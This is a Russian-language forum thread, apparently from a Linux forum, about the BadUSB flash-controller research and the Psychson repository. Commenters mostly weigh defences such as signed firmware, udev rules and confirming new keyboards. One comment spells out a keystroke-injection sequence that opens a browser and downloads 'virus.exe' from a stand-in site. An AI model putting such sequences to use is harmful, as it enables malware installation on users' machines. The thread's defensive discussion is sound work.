Взламываем контроллеры флешек, чтобы превратить их в клавиатуры

В какой-то новости в качестве вектора решения было предложено что-то в стиле «запретить, „отобрать скакалку“, сделать подписанные обновления микрокода, флешка должна быть только флешкой» и т.д.

Мне такой подход не нравится:

• Не люблю закрытость и т.д.; защищать следует увеличивая щит, а не укорачивая всем мечи;
• Кому надо всё равно сделают «устройство, похожее на флешку»;
• Существующие флешки от этого сами не исправятся;

Мне исправление скорее видится в том, чтобы не всегда доверять USB, считая всё пришедшее оттуда (в том числе в виде нажатий на кнопки USB-клавиатуры) недоверенным до подтверждения пользователя.

не всегда доверять USB, считая всё пришедшее оттуда (в том числе в виде нажатий на кнопки USB-клавиатуры) недоверенным до подтверждения пользователя

Обнаружена USB-клавиатура! Она пока не является доверенной, поэтому нажатия с неё не регистрируются. Сделать её доверенной? [Да/Нет]: ...

1. Порты USB могут быть более доверенными и менее доверенными;

2. Старая клавиатура - хорошо, новая клавиатура - введите капчу;

Мне по этому поводу комментарий на cnews.ru показался заслуживающим внимание:

Потому что большому брату нужно, что бы в устройстве поставляемому обычном пользователю, не было дыр извне. Чтобы купив девайс с защитой цифровой подписью, он не мог ничего исправить, иначе, как не вытащив чип для перепрошивки на программаторе, что в большинстве случаев невозможно, когда чип распаян на плате и на что большинство, ввиду этого не пойдет. А тут сразу такие гешефты возникают - как невозможность использования пиратского софта в принципе. Если биос подписан, все девайсы подписаны, софт принудительно инсталлирован и тоже работает только с доверенными подписями, то в случае, если вы не кулхацкер, вы попали на бабки. Вас будут доить без всякого облака. Вот к чему все идет. Полностью закрытые по правам для пользователей системы. Шаг влево, шаг вправо - расстрел на месте. Никаких вам свободных линуксов. Только подписанных цифровым кодом. Разработчик обязан получить лицензию и ЦП, иначе разработкой софта заниматься не сможет.

Параноидально конечно, но все эти поползновения с SecureBoot'ами и очевидное желание у крупных компаний максимально контролировать всю инфраструктуру.

По ссылке виндоподелие.

Да вроде давно уже известно.

1. Порты USB могут быть более доверенными и менее доверенными;
2. Старая клавиатура - хорошо, новая клавиатура - введите капчу;

facepalm.mkv

Теперь понятно, почему в голливудских фильмах «хакеры» подходят компьютеру, вставляют флешку, и получают доступ.

Взламываем, взламываем.

BadUSB

Она пока не является доверенной, поэтому нажатия с неё не регистрируются. Сделать её доверенной? Для подтверждения введите код: «592742».

Флешка же не умеет память читать?

в бухгалтерии все дырки для флешек залиты эпоксидкой

По ссылке exe-файлы. Что это делает на лоре?

Это конец. Даже я, не склонный к паранойе, зассал. Че делать-то?

https://github.com/adamcaudill/Psychson

Show language statistics: C# 61.9%

Яснопонятно.

Это конец.

http://anekdotikov.net/anekdot/13705/

Даже я, не склонный к паранойе, зассал. Че делать-то?

Напиши правило для udev, которое позволяет работать USB-клавиатуре только в одном порту, а на все остальные выводит паническое «ХОЗЯИН НАС ХОТЯТ ПОИМЕТЬ!!111».

а как это сделать? Я в этом udev слабо шарю.

Чтобы купив девайс с защитой цифровой подписью, он не мог ничего исправить, иначе, как не вытащив чип для перепрошивки на программаторе

Ну, это было еще до изобретения RSA в бутах и подписных прошивок. Теперь, даже перепрошив, получишь кирпич - приватные ключи в сейфе у вендора.

Я в этом udev слабо шарю.

Значит, придется курить маны.

Там в репозитории, кроме превращения в клавиатуру, есть более интересный сценарий, в котором контроллер флешки рапортует о полном свободном объеме, но по факту этот объем доступен не весь - часть пространства (с данными) скрыта и доступна только при наступлении определенных событий. Узнать, что там что-то записано, можно только расковыряв прошивку. Вот бы кто запили готовую тулзу...

Мне исправление скорее видится в том, чтобы не всегда доверять USB, считая всё пришедшее оттуда (в том числе в виде нажатий на кнопки USB-клавиатуры) недоверенным до подтверждения пользователя.

Это столько говна надо всякого переписать. Нереально. Алсо, я лично валил ядро в паник кривой реализацией USB на микроконтроллере. При определенных стараниях вполне верю, что можно реализовать аппаратных эксплоит.

Ничего, через некоторое время ты забудешь про этот шум, как забыл и про материнские платы, жесткие диски и прочее, имеющее в себе бэкдоры от АНБ\third party =)

часть пространства (с данными) скрыта и доступна только при наступлении определенных событий. Узнать, что там что-то записано, можно только расковыряв прошивку. Вот бы кто запили готовую тулзу...

А толку-то? На самом чипе не шифровано. Любой школьник тебе феном сдует.

Китайцы наоборот делают - раздувают размер в 2-4 раза, и потом ты сильно удивляешься, когда флешка начинает заполняться. Суки.

Заголовок писал главный редактор жюрнала xakep?

Ничего, через некоторое время ты забудешь про этот шум, как забыл и про материнские платы, жесткие диски и прочее, имеющее в себе бэкдоры от АНБ\third party =)

материнские платы? Это в БИОСе что ли? Вряд ли. У меня процессор не поддерживает виртуализацию.

А в жестких дисках где?

2. Старая клавиатура - хорошо, новая клавиатура - введите капчу;

Keyboard not found. Press F1 to continue.

не всегда доверять USB, считая всё пришедшее оттуда (в том числе в виде нажатий на кнопки USB-клавиатуры) недоверенным до подтверждения пользователя.

И антивирусом, антивирусом все потроха перетряхивать почаще!

Ну будет клавиатура из флешки а дальше то что? Какой сценарий использования?

Почему-то сразу вспонилось сообщение, которое выдавали некоторые BIOS-ы при загрузке без клавиатуры:

ERROR
KEYBOARD NOT FOUND
PRESS F2 TO CONTINUE

превращая флешку в клавиатуру, устанавливать вредоносное программное обеспечение.

Имеется в виду такое чтоли?: win+R iexplore ENTER ctrl+L http://site.ru/virus.exe ENTER TAB TAB ENTER

А в жестких дисках где?

Через прошивку. И опять же, у них может быть секретная область с троянцем каким-нибудь изощренным. Так же как и с флешкой.

не всегда доверять USB, считая всё пришедшее оттуда (в том числе в виде нажатий на кнопки USB-клавиатуры) недоверенным до подтверждения пользователя

новая клавиатура - введите капчу

Keyboard not found, press F1 to continue.

UPD: ого, я уже третий! О_О

А мне вспомнились китайские мышки с кнопкой около колёсика. Жмешь, а мышь посылает Ctrl+R - http://какой-то-сайт - Enter. И вообще, идея не новая: http://avrdevices.ru/malenykaya-usb-pakosty/

Обнаружена USB-клавиатура! Она пока не является доверенной, поэтому нажатия с неё не регистрируются. Сделать её доверенной? [Да/Нет]:

Обнаружена Ь-клавиша! Она пока не является Ъ, поэтому нажатия с неё не регистрируются. Сделать её Ъ? :)

А в жестких дисках где?

Через прошивку. И опять же, у них может быть секретная область с троянцем каким-нибудь изощренным. Так же как и с флешкой.

область-то может быть, да контроллер диска самовольно код исполнять не будет. С прошивкой тоже самое.

я только в упор не вижу, где тут взлом. То, что Phiscon раздолбаи и не удосужились сделать либо шифрование прошивки, либо что-то типа anitfuse — да.

// Купил себе парочку Kingston Datatraveler 111

Что тебе понятно, жалкая быдлятина?

А еще систему можно ломать PCI-устройствами, вот ужас то!

При-чём на некоторых (насколько я понимаю на многих) материнках например сетевушка может невозбранно читать всю память.
Но люди всё-таки редко втыкают в свои компы посторонние PCI карточки, гораздо реже чем флешки.
Но есть и внешние интерфейсы позволяющие прямой доступ к памяти.

Вроде разумно. И не слишком геморройно для пользователя.

У меня, очень давно на одном очень древнем ПК, сетевушка однажды ускорила секунды на часах, примерно в два раза.

А если: «Было обнаружено новое HID-устройство. ID/VID: xxx. %компания%. Для авторизации устройство выберите ответ или введите с клавиатуры: Y/N

Мило. Но не думаю что тут дело в доступе к памяти, скорее какая-то ересь с прерываниями. Например слала те-же прерывания что и системные часы. Впрочем ХЗ, не спец в железе.

моя мышь oscar g10 от a4tech делает похожее, когда не стоят специальная программа для настройки профилей
радует, когда в консоли соляриса начинает происходит ужас от этих нажатий
Хотя в винде удобно - не надо парится с поиском))

авторы - придурки
https://github.com/adamcaudill/Psychson/issues/2

С какой клавиатуры? С той которая была обнаружена и которой мы пока не доверяем, или с другой, доверенной, которая непонятно откуда взялась?

Выше уже предлагали

Она пока не является доверенной, поэтому нажатия с неё не регистрируются. Сделать её доверенной? Для подтверждения введите код: «592742».

все это уже было реализовано в Windows XP

там юсб клавиатура не работала пока не нажмеш далее в мастере оборудования

особенно весело было когда у тебя мыша и клава усбшные и каждая хотит нажать далее

В жестких дисках есть сервисная область, причем размер этой области может достигать сотен мегабайт в особо крупных моделях. Это даже не HPA, а именно область для хранения логов SMART и прочей внутренней бубуйни. Причём, она заполнена обычно от силы процентов на 10-20%, а в остальное пространство можно писать свои данные.

Про якобы наличие неких гипервизоров в прошивках материнок можно почитать тут.

И даже в современные игровые маши уже ставят флеш-память, на которой хранятся макросы для дополнительных кнопок. В теории удобно - все настройки в мыши. На практике - если туда может писать родной софт, то может писать и любой другой.

область-то может быть, да контроллер диска самопроизвольно код исполнять не будет

emulek

PCI - это внутри компьютера и имеет доступ к памяти по умолчанию.

А USB - это то, куда предполагается, что можно вставлять «устройство, похожее на флешку» от друга-шутника и быть уверенным, что произойти может не всё что угодно, а только то, что может USB.